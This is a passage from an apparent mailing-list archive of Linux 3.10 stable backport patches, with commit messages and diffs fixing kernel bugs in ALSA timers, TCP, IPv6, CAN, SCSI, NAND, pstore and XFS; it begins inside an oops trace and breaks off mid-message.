RAX: 0000000000004f76 RBX: ffff880112655e88 RCX: 0000000000000000
RDX: 0000000000000000 RSI: ffff880112655ea0 RDI: 0000000000000001
RBP: ffff88011aa87e00 R08: ffff88013fff905c R09: ffff88013fff9048
R10: ffff88013fff9050 R11: 00000001050a7b8c R12: ffff880114778a00
R13: ffff880114778ab4 R14: ffff880114778b30 R15: 0000000000000000
FS: 00007f071647c700(0000) GS:ffff88011aa80000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000603001 CR3: 0000000112021000 CR4: 00000000000006e0
Stack:
0000000000000000 ffff880114778ab8 ffff880112655ea0 0000000000004f76
ffff880112655ec8 ffff880112655e80 ffff880112655e88 ffff88011aa98fc0
00000000b97ccf2b dffffc0000000000 ffff88011aa98fc0 ffff88011aa87ef0
Call Trace:
<IRQ>
[<ffffffff813abce7>] __hrtimer_run_queues+0x347/0xa00
[<ffffffff82c8bbc0>] ? snd_hrtimer_close+0x130/0x130
[<ffffffff813ab9a0>] ? retrigger_next_event+0x1b0/0x1b0
[<ffffffff813ae1a6>] ? hrtimer_interrupt+0x136/0x4b0
[<ffffffff813ae220>] hrtimer_interrupt+0x1b0/0x4b0
[<ffffffff8120f91e>] local_apic_timer_interrupt+0x6e/0xf0
[<ffffffff81227ad3>] ? kvm_guest_apic_eoi_write+0x13/0xc0
[<ffffffff83c35086>] smp_apic_timer_interrupt+0x76/0xa0
[<ffffffff83c3416c>] apic_timer_interrupt+0x8c/0xa0
<EOI>
[<ffffffff83c3239c>] ? _raw_spin_unlock_irqrestore+0x2c/0x60
[<ffffffff82c8185d>] snd_timer_start1+0xdd/0x670
[<ffffffff82c87015>] snd_timer_continue+0x45/0x80
[<ffffffff82c88100>] snd_timer_user_ioctl+0x1030/0x2830
[<ffffffff8159f3a0>] ? __follow_pte.isra.49+0x430/0x430
[<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
[<ffffffff815a26fa>] ? do_wp_page+0x3aa/0x1c90
[<ffffffff815aa4f8>] ? handle_mm_fault+0xbc8/0x27f0
[<ffffffff815a9930>] ? __pmd_alloc+0x370/0x370
[<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
[<ffffffff816b0733>] do_vfs_ioctl+0x193/0x1050
[<ffffffff816b05a0>] ? ioctl_preallocate+0x200/0x200
[<ffffffff81002f2f>] ? syscall_trace_enter+0x3cf/0xdb0
[<ffffffff815045ba>] ? __context_tracking_exit.part.4+0x9a/0x1e0
[<ffffffff81002b60>] ? exit_to_usermode_loop+0x190/0x190
[<ffffffff82001a97>] ? check_preemption_disabled+0x37/0x1e0
[<ffffffff81d93889>] ? security_file_ioctl+0x89/0xb0
[<ffffffff816b167f>] SyS_ioctl+0x8f/0xc0
[<ffffffff816b15f0>] ? do_vfs_ioctl+0x1050/0x1050
[<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
[<ffffffff83c32b2a>] entry_SYSCALL64_slow_path+0x25/0x25
Code: e8 fc 42 7b fe 8b 0d 06 8a 50 03 49 0f af cf 48 85 c9 0f 88 7c 01 00 00 48 89 4d a8 e8 e0 42 7b fe 48 8b 45 c0 48 8b 4d a8 48 99 <48> f7 f9 49 01 c7 e8 cb 42 7b fe 48 8b 55 d0 48 b8 00 00 00 00
RIP [<ffffffff82c8bd9a>] snd_hrtimer_callback+0x1da/0x3f0
RSP <ffff88011aa87da8>
---[ end trace 6aa380f756a21074 ]---

The problem happens when you call ioctl(SNDRV_TIMER_IOCTL_CONTINUE) on a
completely new/unused timer -- it will have ->sticks == 0, which causes a
divide by 0 in snd_hrtimer_callback().

Signed-off-by: Vegard Nossum <vegard...@oracle.com>
Signed-off-by: Takashi Iwai <ti...@suse.de>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
sound/core/timer.c | 1 +
1 file changed, 1 insertion(+)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index f5ddc9b..f297eac 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -817,6 +817,7 @@ int snd_timer_new(struct snd_card *card, char *id, struct snd_timer_id *tid,
timer->tmr_subdevice = tid->subdevice;
if (id)
strlcpy(timer->id, id, sizeof(timer->id));
+ timer->sticks = 1;
INIT_LIST_HEAD(&timer->device_list);
INIT_LIST_HEAD(&timer->open_list_head);
INIT_LIST_HEAD(&timer->active_list_head);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:05 PM2/5/17
to
From: Eric Dumazet <edum...@google.com>

commit ffb4d6c8508657824bcef68a36b2a0f9d8c09d10 upstream.

If a TCP socket gets a large write queue, an overflow can happen
in a test in __tcp_retransmit_skb() preventing all retransmits.

The flow then stalls and resets after timeouts.

Tested:

sysctl -w net.core.wmem_max=1000000000
netperf -H dest -- -s 1000000000

Signed-off-by: Eric Dumazet <edum...@google.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/ipv4/tcp_output.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 276b283..465285b 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -2327,7 +2327,8 @@ int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb)
* copying overhead: fragmentation, tunneling, mangling etc.
*/
if (atomic_read(&sk->sk_wmem_alloc) >
- min(sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2), sk->sk_sndbuf))
+ min_t(u32, sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2),
+ sk->sk_sndbuf))
return -EAGAIN;

if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) {
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:06 PM2/5/17
to
From: Eric Dumazet <edum...@google.com>

commit bb1fceca22492109be12640d49f5ea5a544c6bb4 upstream.

When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
tail of the write queue using tcp_add_write_queue_tail()

Then it attempts to copy user data into this fresh skb.

If the copy fails, we undo the work and remove the fresh skb.

Unfortunately, this undo lacks the change done to tp->highest_sack and
we can leave a dangling pointer (to a freed skb)

Later, tcp_xmit_retransmit_queue() can dereference this pointer and
access freed memory. For regular kernels where memory is not unmapped,
this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
returning garbage instead of tp->snd_nxt, but with various debug
features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.

This bug was found by Marco Grassi thanks to syzkaller.

Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
Reported-by: Marco Grassi <marc...@gmail.com>
Signed-off-by: Eric Dumazet <edum...@google.com>
Cc: Ilpo Järvinen <ilpo.j...@helsinki.fi>
Cc: Yuchung Cheng <ych...@google.com>
Cc: Neal Cardwell <ncar...@google.com>
Acked-by: Neal Cardwell <ncar...@google.com>
Reviewed-by: Cong Wang <xiyou.w...@gmail.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/net/tcp.h | 2 ++
1 file changed, 2 insertions(+)

diff --git a/include/net/tcp.h b/include/net/tcp.h
index 29a1a63..1c5e037 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1392,6 +1392,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
{
if (sk->sk_send_head == skb_unlinked)
sk->sk_send_head = NULL;
+ if (tcp_sk(sk)->highest_sack == skb_unlinked)
+ tcp_sk(sk)->highest_sack = NULL;
}

static inline void tcp_init_send_head(struct sock *sk)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:06 PM2/5/17
to
From: Eli Cooper <elic...@gmx.com>

commit f4180439109aa720774baafdd798b3234ab1a0d2 upstream.

When xfrm is applied to TSO/GSO packets, it follows this path:

xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()

where skb_gso_segment() relies on skb->protocol to function properly.

This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
fixing a bug where GSO packets sent through a sit tunnel are dropped
when xfrm is involved.

Signed-off-by: Eli Cooper <elic...@gmx.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/ipv4/ip_output.c | 3 +++
1 file changed, 3 insertions(+)

diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
index 57e7450..5f077ef 100644
--- a/net/ipv4/ip_output.c
+++ b/net/ipv4/ip_output.c
@@ -97,6 +97,9 @@ int __ip_local_out(struct sk_buff *skb)

iph->tot_len = htons(skb->len);
ip_send_check(iph);
+
+ skb->protocol = htons(ETH_P_IP);
+
return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT, skb, NULL,
skb_dst(skb)->dev, dst_output);
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:06 PM2/5/17
to
From: Sergei Miroshnichenko <serg...@emcraft.com>

commit 9abefcb1aaa58b9d5aa40a8bb12c87d02415e4c8 upstream.

A timer was used to restart after the bus-off state, leading to a
relatively large can_restart() executed in an interrupt context,
which in turn sets up pinctrl. When this happens during system boot,
there is a high probability of grabbing the pinctrl_list_mutex,
which is locked already by the probe() of other device, making the
kernel suspect a deadlock condition [1].

To resolve this issue, the restart_timer is replaced by a delayed
work.

[1] https://github.com/victronenergy/venus/issues/24

Signed-off-by: Sergei Miroshnichenko <serg...@emcraft.com>
Signed-off-by: Marc Kleine-Budde <m...@pengutronix.de>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/net/can/dev.c | 27 +++++++++++++++++----------
include/linux/can/dev.h | 3 ++-
2 files changed, 19 insertions(+), 11 deletions(-)

diff --git a/drivers/net/can/dev.c b/drivers/net/can/dev.c
index 464e5f6..284d751 100644
--- a/drivers/net/can/dev.c
+++ b/drivers/net/can/dev.c
@@ -22,6 +22,7 @@
#include <linux/slab.h>
#include <linux/netdevice.h>
#include <linux/if_arp.h>
+#include <linux/workqueue.h>
#include <linux/can.h>
#include <linux/can/dev.h>
#include <linux/can/skb.h>
@@ -394,9 +395,8 @@ EXPORT_SYMBOL_GPL(can_free_echo_skb);
/*
* CAN device restart for bus-off recovery
*/
-static void can_restart(unsigned long data)
+static void can_restart(struct net_device *dev)
{
- struct net_device *dev = (struct net_device *)data;
struct can_priv *priv = netdev_priv(dev);
struct net_device_stats *stats = &dev->stats;
struct sk_buff *skb;
@@ -436,6 +436,14 @@ restart:
netdev_err(dev, "Error %d during restart", err);
}

+static void can_restart_work(struct work_struct *work)
+{
+ struct delayed_work *dwork = to_delayed_work(work);
+ struct can_priv *priv = container_of(dwork, struct can_priv, restart_work);
+
+ can_restart(priv->dev);
+}
+
int can_restart_now(struct net_device *dev)
{
struct can_priv *priv = netdev_priv(dev);
@@ -449,8 +457,8 @@ int can_restart_now(struct net_device *dev)
if (priv->state != CAN_STATE_BUS_OFF)
return -EBUSY;

- /* Runs as soon as possible in the timer context */
- mod_timer(&priv->restart_timer, jiffies);
+ cancel_delayed_work_sync(&priv->restart_work);
+ can_restart(dev);

return 0;
}
@@ -472,8 +480,8 @@ void can_bus_off(struct net_device *dev)
priv->can_stats.bus_off++;

if (priv->restart_ms)
- mod_timer(&priv->restart_timer,
- jiffies + (priv->restart_ms * HZ) / 1000);
+ schedule_delayed_work(&priv->restart_work,
+ msecs_to_jiffies(priv->restart_ms));
}
EXPORT_SYMBOL_GPL(can_bus_off);

@@ -556,6 +564,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max)
return NULL;

priv = netdev_priv(dev);
+ priv->dev = dev;

if (echo_skb_max) {
priv->echo_skb_max = echo_skb_max;
@@ -565,7 +574,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max)

priv->state = CAN_STATE_STOPPED;

- init_timer(&priv->restart_timer);
+ INIT_DELAYED_WORK(&priv->restart_work, can_restart_work);

return dev;
}
@@ -599,8 +608,6 @@ int open_candev(struct net_device *dev)
if (!netif_carrier_ok(dev))
netif_carrier_on(dev);

- setup_timer(&priv->restart_timer, can_restart, (unsigned long)dev);
-
return 0;
}
EXPORT_SYMBOL_GPL(open_candev);
@@ -615,7 +622,7 @@ void close_candev(struct net_device *dev)
{
struct can_priv *priv = netdev_priv(dev);

- del_timer_sync(&priv->restart_timer);
+ cancel_delayed_work_sync(&priv->restart_work);
can_flush_echo_skb(dev);
}
EXPORT_SYMBOL_GPL(close_candev);
diff --git a/include/linux/can/dev.h b/include/linux/can/dev.h
index fb0ab65..fb9fbe2 100644
--- a/include/linux/can/dev.h
+++ b/include/linux/can/dev.h
@@ -31,6 +31,7 @@ enum can_mode {
* CAN common private data
*/
struct can_priv {
+ struct net_device *dev;
struct can_device_stats can_stats;

struct can_bittiming bittiming;
@@ -42,7 +43,7 @@ struct can_priv {
u32 ctrlmode_supported;

int restart_ms;
- struct timer_list restart_timer;
+ struct delayed_work restart_work;

int (*do_set_bittiming)(struct net_device *dev);
int (*do_set_mode)(struct net_device *dev, enum can_mode mode);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:06 PM2/5/17
to
From: Karl Beldan <kbe...@baylibre.com>

commit f6d7c1b5598b6407c3f1da795dd54acf99c1990c upstream.

This fixes subpage writes when using 4-bit HW ECC.

There has been numerous reports about ECC errors with devices using this
driver for a while. Also the 4-bit ECC has been reported as broken with
subpages in [1] and with 16 bits NANDs in the driver and in mach* board
files both in mainline and in the vendor BSPs.

What I saw with 4-bit ECC on a 16bits NAND (on an LCDK) which got me to
try reinitializing the ECC engine:
- R/W on whole pages properly generates/checks RS code
- try writing the 1st subpage only of a blank page, the subpage is well
written and the RS code properly generated, re-reading the same page
the HW detects some ECC error, reading the same page again no ECC
error is detected

Note that the ECC engine is already reinitialized in the 1-bit case.

Tested on my LCDK with UBI+UBIFS using subpages.
This could potentially get rid of the issue workarounded in [1].

[1] 28c015a9daab ("mtd: davinci-nand: disable subpage write for keystone-nand")

Fixes: 6a4123e581b3 ("mtd: nand: davinci_nand, 4-bit ECC for smallpage")
Signed-off-by: Karl Beldan <kbe...@baylibre.com>
Acked-by: Boris Brezillon <boris.b...@free-electrons.com>
Signed-off-by: Brian Norris <computer...@gmail.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/mtd/nand/davinci_nand.c | 3 +++
1 file changed, 3 insertions(+)

diff --git a/drivers/mtd/nand/davinci_nand.c b/drivers/mtd/nand/davinci_nand.c
index c3e15a5..e4f16cf 100644
--- a/drivers/mtd/nand/davinci_nand.c
+++ b/drivers/mtd/nand/davinci_nand.c
@@ -241,6 +241,9 @@ static void nand_davinci_hwctl_4bit(struct mtd_info *mtd, int mode)
unsigned long flags;
u32 val;

+ /* Reset ECC hardware */
+ davinci_nand_readl(info, NAND_4BIT_ECC1_OFFSET);
+
spin_lock_irqsave(&davinci_nand_lock, flags);

/* Start 4-bit ECC calculation for read/write */
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:06 PM2/5/17
to
From: Dan Carpenter <dan.ca...@oracle.com>

commit 2d6a4d64812bb12dda53704943b61a7496d02098 upstream.

The curly braces are missing here so we print stuff unintentionally.

Fixes: 9da4714a2d44 ('slub: slabinfo update for cmpxchg handling')
Link: http://lkml.kernel.org/r/20160715211243.GE19522@mwanda
Signed-off-by: Dan Carpenter <dan.ca...@oracle.com>
Acked-by: Christoph Lameter <c...@linux.com>
Cc: Sergey Senozhatsky <sergey.se...@gmail.com>
Cc: Colin Ian King <colin...@canonical.com>
Cc: Laura Abbott <lab...@fedoraproject.org>
Signed-off-by: Andrew Morton <ak...@linux-foundation.org>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
tools/vm/slabinfo.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/tools/vm/slabinfo.c b/tools/vm/slabinfo.c
index 808d5a9..bcc6125 100644
--- a/tools/vm/slabinfo.c
+++ b/tools/vm/slabinfo.c
@@ -493,10 +493,11 @@ static void slab_stats(struct slabinfo *s)
s->alloc_node_mismatch, (s->alloc_node_mismatch * 100) / total);
}

- if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail)
+ if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail) {
printf("\nCmpxchg_double Looping\n------------------------\n");
printf("Locked Cmpxchg Double redos %lu\nUnlocked Cmpxchg Double redos %lu\n",
s->cmpxchg_double_fail, s->cmpxchg_double_cpu_fail);
+ }
}

static void report(struct slabinfo *s)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:06 PM2/5/17
to
From: Felipe Balbi <felipe...@linux.intel.com>

commit 6c83f77278f17a7679001027e9231291c20f0d8a upstream.

If we don't guarantee that we will always get an
interrupt at least when we're queueing our very last
request, we could fall into situation where we queue
every request with 'no_interrupt' set. This will
cause the link to get stuck.

The behavior above has been triggered with g_ether
and dwc3.

Reported-by: Ville Syrjälä <ville....@linux.intel.com>
Signed-off-by: Felipe Balbi <felipe...@linux.intel.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/usb/gadget/u_ether.c | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c
index 4b76124..aad066d 100644
--- a/drivers/usb/gadget/u_ether.c
+++ b/drivers/usb/gadget/u_ether.c
@@ -586,8 +586,9 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb,

/* throttle high/super speed IRQ rate back slightly */
if (gadget_is_dualspeed(dev->gadget))
- req->no_interrupt = (dev->gadget->speed == USB_SPEED_HIGH ||
- dev->gadget->speed == USB_SPEED_SUPER)
+ req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH ||
+ dev->gadget->speed == USB_SPEED_SUPER)) &&
+ !list_empty(&dev->tx_reqs))
? ((atomic_read(&dev->tx_qlen) % qmult) != 0)
: 0;

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:06 PM2/5/17
to
From: Joe Perches <j...@perches.com>

commit 8c7fbe5795a016259445a61e072eb0118aaf6a61 upstream.

Commit 3876488444e7 ("include/stddef.h: Move offsetofend() from vfio.h
to a generic kernel header") added offsetofend outside the normal
include #ifndef/#endif guard. Move it inside.

Miscellanea:

o remove unnecessary blank line
o standardize offsetof macros whitespace style

Signed-off-by: Joe Perches <j...@perches.com>
Cc: Denys Vlasenko <dvla...@redhat.com>
Signed-off-by: Andrew Morton <ak...@linux-foundation.org>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/stddef.h | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/include/linux/stddef.h b/include/linux/stddef.h
index 076af43..9c61c7c 100644
--- a/include/linux/stddef.h
+++ b/include/linux/stddef.h
@@ -3,7 +3,6 @@

#include <uapi/linux/stddef.h>

-
#undef NULL
#define NULL ((void *)0)

@@ -14,10 +13,9 @@ enum {

#undef offsetof
#ifdef __compiler_offsetof
-#define offsetof(TYPE,MEMBER) __compiler_offsetof(TYPE,MEMBER)
+#define offsetof(TYPE, MEMBER) __compiler_offsetof(TYPE, MEMBER)
#else
-#define offsetof(TYPE, MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
-#endif
+#define offsetof(TYPE, MEMBER) ((size_t)&((TYPE *)0)->MEMBER)
#endif

/**
@@ -28,3 +26,5 @@ enum {
*/
#define offsetofend(TYPE, MEMBER) \
(offsetof(TYPE, MEMBER) + sizeof(((TYPE *)0)->MEMBER))
+
+#endif
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:06 PM2/5/17
to
From: Ching Huang <chin...@areca.com.tw>

commit 2bf7dc8443e113844d078fd6541b7f4aa544f92f upstream.

The arcmsr driver failed to pass SYNCHRONIZE CACHE to controller
firmware. Depending on how drive caches are handled internally by
controller firmware this could potentially lead to data integrity
problems.

Ensure that cache flushes are passed to the controller.

[mkp: applied by hand and removed unused vars]

Signed-off-by: Ching Huang <chin...@areca.com.tw>
Reported-by: Tomas Henzl <the...@redhat.com>
Signed-off-by: Martin K. Petersen <martin....@oracle.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/scsi/arcmsr/arcmsr_hba.c | 9 ---------
1 file changed, 9 deletions(-)

diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
index 66dda86..8d9477c 100644
--- a/drivers/scsi/arcmsr/arcmsr_hba.c
+++ b/drivers/scsi/arcmsr/arcmsr_hba.c
@@ -2069,18 +2069,9 @@ static int arcmsr_queue_command_lck(struct scsi_cmnd *cmd,
struct AdapterControlBlock *acb = (struct AdapterControlBlock *) host->hostdata;
struct CommandControlBlock *ccb;
int target = cmd->device->id;
- int lun = cmd->device->lun;
- uint8_t scsicmd = cmd->cmnd[0];
cmd->scsi_done = done;
cmd->host_scribble = NULL;
cmd->result = 0;
- if ((scsicmd == SYNCHRONIZE_CACHE) ||(scsicmd == SEND_DIAGNOSTIC)){
- if(acb->devstate[target][lun] == ARECA_RAID_GONE) {
- cmd->result = (DID_NO_CONNECT << 16);
- }
- cmd->scsi_done(cmd);
- return 0;
- }
if (target == 16) {
/* virtual device for iop message transfer */
arcmsr_handle_virtual_command(acb, cmd);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:07 PM2/5/17
to
From: Andrew Bresticker <abre...@chromium.org>

commit d771fdf94180de2bd811ac90cba75f0f346abf8d upstream.

The ramoops buffer may be mapped as either I/O memory or uncached
memory. On ARM64, this results in a device-type (strongly-ordered)
mapping. Since unnaligned accesses to device-type memory will
generate an alignment fault (regardless of whether or not strict
alignment checking is enabled), it is not safe to use memcpy().
memcpy_fromio() is guaranteed to only use aligned accesses, so use
that instead.

Signed-off-by: Andrew Bresticker <abre...@chromium.org>
Signed-off-by: Enric Balletbo Serra <enric.b...@collabora.com>
Reviewed-by: Puneet Kumar <punee...@chromium.org>
Signed-off-by: Kees Cook <kees...@chromium.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/pstore/ram_core.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index eb42483..7df456d 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -286,8 +286,8 @@ void persistent_ram_save_old(struct persistent_ram_zone *prz)
}

prz->old_log_size = size;
- memcpy(prz->old_log, &buffer->data[start], size - start);
- memcpy(prz->old_log + size - start, &buffer->data[0], start);
+ memcpy_fromio(prz->old_log, &buffer->data[start], size - start);
+ memcpy_fromio(prz->old_log + size - start, &buffer->data[0], start);
}

int notrace persistent_ram_write(struct persistent_ram_zone *prz,
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:07 PM2/5/17
to
From: Kashyap Desai <kashya...@broadcom.com>

commit 1e793f6fc0db920400574211c48f9157a37e3945 upstream.

Commit 02b01e010afe ("megaraid_sas: return sync cache call with
success") modified the driver to successfully complete SYNCHRONIZE_CACHE
commands without passing them to the controller. Disk drive caches are
only explicitly managed by controller firmware when operating in RAID
mode. So this commit effectively disabled writeback cache flushing for
any drives used in JBOD mode, leading to data integrity failures.

[mkp: clarified patch description]

Fixes: 02b01e010afeeb49328d35650d70721d2ca3fd59
Signed-off-by: Kashyap Desai <kashya...@broadcom.com>
Signed-off-by: Sumit Saxena <sumit....@broadcom.com>
Reviewed-by: Tomas Henzl <the...@redhat.com>
Reviewed-by: Hannes Reinecke <ha...@suse.com>
Reviewed-by: Ewan D. Milne <emi...@redhat.com>
Signed-off-by: Martin K. Petersen <martin....@oracle.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/scsi/megaraid/megaraid_sas_base.c | 13 +++++--------
1 file changed, 5 insertions(+), 8 deletions(-)

diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
index 6ced6a3..0626a16 100644
--- a/drivers/scsi/megaraid/megaraid_sas_base.c
+++ b/drivers/scsi/megaraid/megaraid_sas_base.c
@@ -1487,16 +1487,13 @@ megasas_queue_command_lck(struct scsi_cmnd *scmd, void (*done) (struct scsi_cmnd
goto out_done;
}

- switch (scmd->cmnd[0]) {
- case SYNCHRONIZE_CACHE:
- /*
- * FW takes care of flush cache on its own
- * No need to send it down
- */
+ /*
+ * FW takes care of flush cache on its own for Virtual Disk.
+ * No need to send it down for VD. For JBOD send SYNCHRONIZE_CACHE to FW.
+ */
+ if ((scmd->cmnd[0] == SYNCHRONIZE_CACHE) && MEGASAS_IS_LOGICAL(scmd)) {
scmd->result = DID_OK << 16;
goto out_done;
- default:
- break;
}

if (instance->instancet->build_and_issue_cmd(instance, scmd)) {
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:07 PM2/5/17
to
From: Wei Yongjun <weiyo...@huawei.com>

commit 751eb6b6042a596b0080967c1a529a9fe98dac1d upstream.

In general, when DAD detected IPv6 duplicate address, ifp->state
will be set to INET6_IFADDR_STATE_ERRDAD and DAD is stopped by a
delayed work, the call tree should be like this:

ndisc_recv_ns
-> addrconf_dad_failure <- missing ifp put
-> addrconf_mod_dad_work
-> schedule addrconf_dad_work()
-> addrconf_dad_stop() <- missing ifp hold before call it

addrconf_dad_failure() called with ifp refcont holding but not put.
addrconf_dad_work() call addrconf_dad_stop() without extra holding
refcount. This will not cause any issue normally.

But the race between addrconf_dad_failure() and addrconf_dad_work()
may cause ifp refcount leak and netdevice can not be unregister,
dmesg show the following messages:

IPv6: eth0: IPv6 duplicate address fe80::XX:XXXX:XXXX:XX detected!
...
unregister_netdevice: waiting for eth0 to become free. Usage count = 1

Cc: sta...@vger.kernel.org
Fixes: c15b1ccadb32 ("ipv6: move DAD and addrconf_verify processing
to workqueue")
Signed-off-by: Wei Yongjun <weiyo...@huawei.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Cc: <sta...@vger.kernel.org>
Signed-off-by: Mike Manning <mman...@brocade.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/ipv6/addrconf.c | 2 ++
1 file changed, 2 insertions(+)

diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 98dd353..0f18d858 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -1694,6 +1694,7 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp)
spin_unlock_bh(&ifp->state_lock);

addrconf_mod_dad_work(ifp, 0);
+ in6_ifa_put(ifp);
}

/* Join to solicited addr multicast group. */
@@ -3337,6 +3338,7 @@ static void addrconf_dad_work(struct work_struct *w)
addrconf_dad_begin(ifp);
goto out;
} else if (action == DAD_ABORT) {
+ in6_ifa_hold(ifp);
addrconf_dad_stop(ifp, 1);
goto out;
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:07 PM2/5/17
to
From: Dave Chinner <dchi...@redhat.com>

commit f3d7ebdeb2c297bd26272384e955033493ca291c upstream.

From inspection, the superblock sb_inprogress check is done in the
verifier and triggered only for the primary superblock via a
"bp->b_bn == XFS_SB_DADDR" check.

Unfortunately, the primary superblock is an uncached buffer, and
hence it is configured by xfs_buf_read_uncached() with:

bp->b_bn = XFS_BUF_DADDR_NULL; /* always null for uncached buffers */

And so this check never triggers. Fix it.

Signed-off-by: Dave Chinner <dchi...@redhat.com>
Reviewed-by: Brian Foster <bfo...@redhat.com>
Reviewed-by: Christoph Hellwig <h...@lst.de>
Signed-off-by: Dave Chinner <da...@fromorbit.com>
[wt: s/xfs_sb.c/xfs_mount.c in 3.10]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/xfs/xfs_mount.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/xfs/xfs_mount.c b/fs/xfs/xfs_mount.c
index e8e310c..363c4cc 100644
--- a/fs/xfs/xfs_mount.c
+++ b/fs/xfs/xfs_mount.c
@@ -689,7 +689,8 @@ xfs_sb_verify(
* Only check the in progress field for the primary superblock as
* mkfs.xfs doesn't clear it from secondary superblocks.
*/
- return xfs_mount_validate_sb(mp, &sb, bp->b_bn == XFS_SB_DADDR,
+ return xfs_mount_validate_sb(mp, &sb,
+ bp->b_maps[0].bm_bn == XFS_SB_DADDR,
check_version);
}

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:07 PM2/5/17
to
From: Manfred Spraul <man...@colorfullife.com>

commit 5864a2fd3088db73d47942370d0f7210a807b9bc upstream.

Commit 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()") introduced a
race:

sem_lock has a fast path that allows parallel simple operations.
There are two reasons why a simple operation cannot run in parallel:
- a non-simple operations is ongoing (sma->sem_perm.lock held)
- a complex operation is sleeping (sma->complex_count != 0)

As both facts are stored independently, a thread can bypass the current
checks by sleeping in the right positions. See below for more details
(or kernel bugzilla 105651).

The patch fixes that by creating one variable (complex_mode)
that tracks both reasons why parallel operations are not possible.

The patch also updates stale documentation regarding the locking.

With regards to stable kernels:
